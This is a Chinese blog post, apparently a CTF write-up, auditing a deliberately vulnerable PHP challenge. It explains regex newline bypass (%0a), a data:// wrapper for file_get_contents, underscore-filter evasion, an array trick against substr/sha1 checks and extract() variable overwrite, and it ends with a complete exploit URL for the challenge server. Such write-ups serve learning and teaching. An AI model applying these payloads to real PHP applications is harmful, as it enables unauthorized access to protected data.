简单的套娃

最新推荐文章于 2024-05-18 23:14:17 发布
最新推荐文章于 2024-05-18 23:14:17 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: php代码审计 文章标签: web php 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46230316/article/details/105912930
版权

套娃

最简单的那种套娃

<?php 
include 'flag.php';
highlight_file(__FILE__); 
error_reporting(0); 

$ia = "index.php"; 
$query = $_SERVER['QUERY_STRING'];
//var_dump($_GET);
if (preg_match('/^xxxxisfun$/', $_GET['xxxx']) && $_GET['xxxx'] !== 'xxxxisfun') {
  $ia = $_GET["id"];
}


if(file_get_contents($ia)!=='xxxxisfun') { 
  die('go away'); 
} 

if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
  die('no!');
}
if($_GET['x_x_x_x'] !== '666' && preg_match('/^666$/', $_GET['x_x_x_x'])){
  echo "let's go";

if($_GET)
$tql = $_GET['tql']; 
$action=''; 
if(substr($_GET['tql'], 32) === sha1($_GET['tql'])) { 
  extract($_GET["flag"]); 
} 

if($action === 'givemeflag'){
  echo $flag;
}
}
else
{
  echo 'nonono';
}

?>

preg_match 执行匹配正则表达式

file_get_contents() 函数把整个文件读入一个字符串中

if (preg_match('/^xxxxisfun$/', $_GET['xxxx']) && $_GET['xxxx'] !== 'xxxxisfun') {
  $ia = $_GET["id"];
}


if(file_get_contents($ia)!=='xxxxisfun') { 
  die('go away'); 
}

进行审计,这里有两个条件

  • 第一个就是xxxx===xxxxisfun,很简单,这里的正则表达式检查第一个和最后一个字符,可以用/的URL编码%0a绕过

  • 第二个是通过file_get_content函数将整个数据读入一个字符串中,但是后面的值使用的单引号,并且中间使用===来判断全等,通过查找这里可以使用data:// 来进行转换 格式为data://text/plain;base64,将xxxxisfun进行base64编码得到eHh4eGlzZnVu,所以需要通过get提交一个名为id的参数,值为data://text/plain;base64,eHh4eGlzZnVu
    xxxx=xxxxisfun%0a&id=data://text/plain;base64,eHh4eGlzZnVu


if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
  die('no!');
}
if($_GET['x_x_x_x'] !== '666' && preg_match('/^666$/', $_GET['x_x_x_x'])){
  echo "let's go";

这里的意思是x_x_x_x===666但是不能有_和他的URL编码

这里利用正则匹配绕过一下,‘.’匹配任意任意一个字符

在这里插入图片描述

构造x.x.x.x=666

if($_GET)
$tql = $_GET['tql']; 
$action=''; 
if(substr($_GET['tql'], 32) === sha1($_GET['tql'])) { 
  extract($_GET["flag"]); 
} 

if($action === 'givemeflag'){
  echo $flag;
}

这里是一个变量覆盖

  • tql[]是为了绕过substr函数的限制,subster不能处理数组,所以会把返回值为空,sha1函数也是,空===空,所以继续进行。
  • extract函数从数组中将变量导入当前页面,用get传入一个flag[action]=givemeflag,到extract里就是extract(flag[action]=givemeflag),这时flag就是个数组,生成了一个名为action,值为givemeflag的变量,将原来的$action=‘’给覆盖了

playload:tql[]=&flag[action]=givemeflag

总playload:

http://49.234.5.69:30001/?xxxx=xxxxisfun%0a&id=data://text/plain;base64,eHh4eGlzZnVu&x.x.x.x=666%0a&tql[]=&flag[action]=givemeflag
在这里插入图片描述

mon0dy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网赚APP的“俄罗斯”游戏.docx
05-01
### 网赚APP的“俄罗斯”游戏——揭秘其背后的运作机制 #### 一、网赚APP的兴起与目标群体 随着互联网技术的普及和发展,越来越多的网赚APP开始进入人们的视野,特别是对于中老年群体来说,这类APP似乎提供了...
CTF中PHP相关题目考点总结(二)
weixin_68789096的博客
06-24 1120
本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。
中国海洋大学新生赛
最新发布
pwfortune的博客
05-18 820
使用 parse_str 函数解析查询字符串,将其转换为 PHP 变量。name=John&age=30,那么 parse_str 会创建两个变量 $name 和 $age,并分别赋值为 John 和 30。在php中 . 和空格 在传参时会被转化成下划线,正好前面把 . 和 _ 给过滤了 ,用空格替代。因为前面存在的parse_str() 函数,能够变量覆盖, 然后再进行MD5弱比较。可在eval()中多重转码混淆,依旧可以执行js代码,有返回值。还需要绕过preg_match(),而在非多行模式下,
PHP 原生类学习与利用
snowlyzz的博客
09-22 1374
php 原生类利用与学习。
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1650
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
2022NISACTF
unexpectedthing的博客
07-13 1440
NISACTF
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
Scratch趣味小游戏源码合集儿童趣味编程源码参考Scratch游戏源码下载
09-16
Scratch趣味小游戏源码合集儿童趣味编程源码参考Scratch游戏源码下载,scratch小游戏合集,适合小朋友自学。新颖、有趣的游戏制作可以激发孩子的学习兴趣。家里有朋友的家长记得给小朋友下载学习哦,游戏的素材非常...
leetcode信封-LeetCode-QA:LeetCode-QA
06-30
leetcode信封 LeetCode-QA ...用于记录上的解答 ...俄罗斯信封问题 困难 503 下一个更大元素 II 中等 706 设计哈希映射 简单 1047 删除字符串中的所有相邻重复项 简单 1629 按键持续时间最长的键 简单 1779
Python-Python隐写工具用来在图像中隐藏图像或文本
08-10
至于压缩包中的文件“Matroschka-master”,这个名字可能是指一个开源项目或库,它与俄罗斯(Matryoshka dolls)的层层嵌概念相呼应,可能意味着该工具能够在图像中嵌多层隐藏信息。在Python中,这样的实现...
ctfshow web入门 php特性
Sentiment的博客
04-11 5328
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
SICTF2023#Round2-WEB
m0_68113265的博客
09-10 411
pop链:由class B的__destruct触发class A的tostring。k_e_y不等于123同时又要满足123可以%0A来绕过preg_match。同时不能出现_和%5f可以空格替代。最后触发class B的clone。接着触发class B的game。然后触发class P的call。command就是无参命令执行。直接包含,flag在根目录。禁用(可以考虑直接包含。
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5652
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
PHP反序列化(231119)
mo2901600657的博客
11-19 210
2023/11/19学习内容:php反序列化知识来源:橙子科技工作室。
ctf bugku 变量1
qq_35191331的博客
08-12 3546
flag In the variable !  error_reporting(0); // 关闭php错误显示 include "flag1.php"; // 引入flag1.php文件代码 highlight_file(__file__); if(isset($_GET['args'])){ // 通过get方式传递 args变量才能执行if里面的代码     $args
PHP渗透测试题目笔记
Zeker62的博客
02-10 5533
简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
ctfshow-php特性-超详解(干货)
qq_50589021的博客
08-05 6544
PHP特性 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } ?> intval函数(获
ctfshow php特性系列
xiaolong22333的博客
04-18 4301
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
ctfshowshell
08-24
CTFSHOWshell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOWshell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值